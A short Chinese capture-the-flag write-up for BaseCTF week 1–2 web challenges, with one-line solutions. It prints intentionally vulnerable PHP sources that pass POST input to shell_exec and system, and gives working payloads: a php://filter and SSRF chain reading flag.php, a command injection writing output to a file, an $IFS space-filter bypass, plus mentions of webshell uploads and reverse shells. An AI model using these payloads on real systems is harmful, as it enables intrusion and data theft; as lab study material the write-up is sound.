BaseCTF_WP

发布时间 : 2024-08-19 23:43

[Week1] HTTP 是什么呀
[Week1] 喵喵喵´•ﻌ•`
[Week1] md5绕过欸
[Week1] A Dark Room
[Week1] upload
[Week1] Aura 酱的礼物
[Week2] 你听不到我的声音
[Week2] RCEisamazingwithspace
[Week2] 一起吃豆豆

[Week1] HTTP 是什么呀

传入如图的请求头和参数即可，flag在network

[Week1] 喵喵喵´•ﻌ•`

[Week1] md5绕过欸

数组绕过

[Week1] A Dark Room

信息搜集F12

[Week1] upload

传个马就ok

[Week1] Aura 酱的礼物

考点：SSRF&strpos函数的理解

最终payload:

pen=data://text/plain,Aura&challenge=http://jasmineaura.github.io@challenge.basectf.fun:23111/&gift=php://filter/read=convert.base64-encode/resource=flag.php

[Week2] 你听不到我的声音

<?php
highlight_file(__FILE__);
shell_exec($_POST['cmd']);

shell_exec这个函数可以执行命令，但是会没有回显，这个时候如果题目的环境是出网的话，我们可以利用反弹shell来获取flag，同时我们也可以用重定向符号将执行命令获取的信息写到一个文件里去

payload： cmd=ls />1.txt

然后访问1.txt就可以看到命令执行后的内容

补充：我们还可以通过sleep函数来判断自己的命令有没有被成功执行

如果看到页面一直在加载，然后转好了，就说明我们成功执行了命令

[Week2] RCEisamazingwithspace

//题目源码
<?php
highlight_file(__FILE__);
$cmd = $_POST['cmd'];
// check if space is present in the command
// use of preg_match to check if space is present in the command
if (preg_match('/\s/', $cmd)) {
    echo 'Space not allowed in command';
    exit;
}

// execute the command
system($cmd);

就是个空格绕过

$IFS –>常见的空格绕过字符

[Week2] 一起吃豆豆

在index.js源码里发现gameover的函数，base64解密一下就是flag